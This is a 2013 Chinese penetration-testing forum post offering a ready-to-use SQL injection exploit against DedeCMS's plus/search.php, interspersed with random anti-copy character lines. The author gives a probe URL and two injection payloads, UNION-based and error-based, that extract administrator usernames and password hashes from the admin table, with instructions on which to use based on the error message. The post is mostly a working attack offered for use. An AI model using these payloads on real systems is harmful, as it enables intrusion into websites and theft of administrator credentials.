中国网络渗透测试联盟
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
[打印本页]
作者:
admin
时间:
2013-1-21 08:45
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ
( c" N2 @* Y( a5 ]1 @* ]/ K5 G
3 b" q2 k9 q7 S" H) |5 E4 `
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
' @9 x* C. T2 S. U" l7 l
9 w3 Q/ a+ Q4 D* x& W; n8 t0 u
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
; E# e2 u$ e1 v% }' V- J
8 i* M9 |" }+ b5 }" u& j
我一般是这样测试的:
1 ^% f1 \9 U" Z6 C
# d. R9 k+ o5 W! H
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
" ~: t+ `( ^; G) T
8 L' C2 _5 c! u0 R+ L- ^
转载不加作者名的没JJ
& M5 ~% x/ l8 a" S+ c
v2 L" G) ^* }
作者:鬼哥
, }- F1 l' u% g# Q/ A+ w9 w0 K
# c, c2 a7 K9 M
: j2 a! H( a; ^0 K. [# J0 P
+ Z1 i$ w1 k ]! }5 p1 M6 Q
看结果如果提示
5 {) S3 r* C5 g$ b6 X, @
% C1 T" ]5 [! V9 q! f2 X' e, \* Y, K4 q" d G
Safe Alert: Request Error step 2 !
8 ^9 T* I3 ^: J0 }
3 e8 I# a! k. M, k) r, S
那么直接用下面的exp
+ t0 R) a4 R* X; W; R% e% v9 l
5 m" H1 a# y9 ]* b
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
2 m6 D9 N/ I" t% H% q# a) z+ H5 ^+ S
& z& A* h# t* s5 R6 f+ s0 o2 C
4 m1 p- B) c. S6 y3 A9 t
看结果如果提示
$ [& S2 P' L- K, D8 Q8 J
. a2 r2 U" O! U; Z0 h j2 Y
Safe Alert: Request Error step 1 !
& D/ L8 d! ~% d; }, o6 J1 M
9 F. O4 X& n+ t$ M k/ ~( H
那么直接用下面的exp
9 p5 a4 S7 ?+ h. ?6 ]
: e$ R/ H0 { R- |1 N6 i
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
9 A, `" p+ g2 R7 u
5 E2 w0 {2 C- J6 {9 {
, {0 `8 G2 Z; j" M
如果正常显示证明漏洞不存在了。
! Z% @$ V; e1 L& [ |1 q
5 l" M2 R- ~0 i' D) \$ g, V/ s
转载不加作者名的没JJ
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2